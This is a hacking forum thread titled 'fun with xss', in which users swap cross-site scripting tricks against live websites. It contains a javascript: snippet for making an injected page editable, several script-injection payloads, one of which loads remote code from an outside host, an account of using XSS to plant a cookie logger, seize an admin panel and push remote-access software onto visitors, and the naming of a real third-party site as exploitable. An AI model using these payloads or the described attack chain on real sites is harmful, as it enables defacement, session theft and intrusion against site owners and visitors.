Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

fun with xss


ghost's Avatar
0 0

Here is a little fun you can have with xss. You can use javascript code: javascript: document.body.contentEditable ='true'; document.designMode='on'; void 0 (take out the space between javascript: documnet *damn smileys)

inside your xss statement. Anyone who visits the page you just xss'ed can now edit the page to there liking. *I know this is old code, and i know that lots of people know about it, but i have never heard of anyone injecting it into an xss attack. (have fun)


rex_mundi's Avatar
☆ Lucifer ☆
3,050 6

Is this your mums site? :right:


yours31f's Avatar
Retired
10 0

nope. One of my friends ask me to help him see if it was secure. (i didn't do much btw si i don't know if it has any holes.)


rex_mundi's Avatar
☆ Lucifer ☆
3,050 6

Trying to deface a dead pensioners site man , tut tut.


yours31f's Avatar
Retired
10 0

nope, I was just helping to secure it. I was ask for help, and it will be fixed tomorrow.


ghost's Avatar
0 0

Best fun ive ever had with XSS was iFrames. The XSS allowed me to chuck a cookie logger on the page. Then once I had admin cPanel I chucked iFrames all over it : ] If a site already has some activex on it then your in luck. Create an iFrame linking to you logmein vpn install software page. Then upon visiting a vnc is installed for you. Wow wasnt that easy. Ill draw up some code for it today. I got work at computer help now :ninja:


yours31f's Avatar
Retired
10 0

right now im just doing this

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>


ghost's Avatar
0 0

yours3lf, if you're talking about xssing the site you just posted, I don't think that is going to work (at least from ?page.php=xsshere). It looks like they are using switch case and the default case displays that error page. Good luck though Edit: i lied about the switch case. That is the default error message, but you still won't be able to xss it since it wont return the values back onto the page.


rex_mundi's Avatar
☆ Lucifer ☆
3,050 6

Dude , don't encourage him.


rex_mundi's Avatar
☆ Lucifer ☆
3,050 6

You know its true :p


ghost's Avatar
0 0

yours31f wrote: right now im just doing this

"> <script>alert("xssed");</script>

"</textarea> <script>alert("xssed");</script>

"><script src="http://yours31f.ulmb.com/xss.html"></script>

Go back to the cheat sheet and get some more ideas.


ghost's Avatar
0 0

Most of the sites hosted by the Russian Information Network are pretty exploitable to XSS. There are quite a few of them, and even search.rin.ru, their main search engine, is exploitable. This is good for experimentally learning more about the exploit and how it can used for things other than creating alert boxes and stealing cookies. XSS is a powerful exploit that is often misused, attempt not to add on to the misuse.


ghost's Avatar
0 0

:| You shouldn't put URLs if you're going to tell the community that they're vulnerable to some sort of attack…


ghost's Avatar
0 0

Technically, I didn't post the URL. I only posted the host, which is one of many parts of a full URL. Despite this, I do understand what you are trying to say and I'll be more careful next time. :D


yours31f's Avatar
Retired
10 0

and the one I posted (as far as I know) is not.


ghost's Avatar
0 0

Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcutts.com/blog/seo-glossary-url-definitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.


ghost's Avatar
0 0

HZ wrote: Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.

http://www.mattcutts.com/blog/seo-glossary-url-definitions/

Seriously, if only you'd use Google more often, you wouldn't be flamed as often.

I think he was speaking of the fact that the URL he posted wasn't vulnerable.

Please, as a (new) member of this community, don't be so quick to flame other members of the community


yours31f's Avatar
Retired
10 0

thats exactly what i was saying.


ghost's Avatar
0 0

Understood, but despite all of this, Google is still your best friend. :D


ghost's Avatar
0 0

… Let it go.


ghost's Avatar
0 0

Well that was a brilliant discussion about xss wasent it.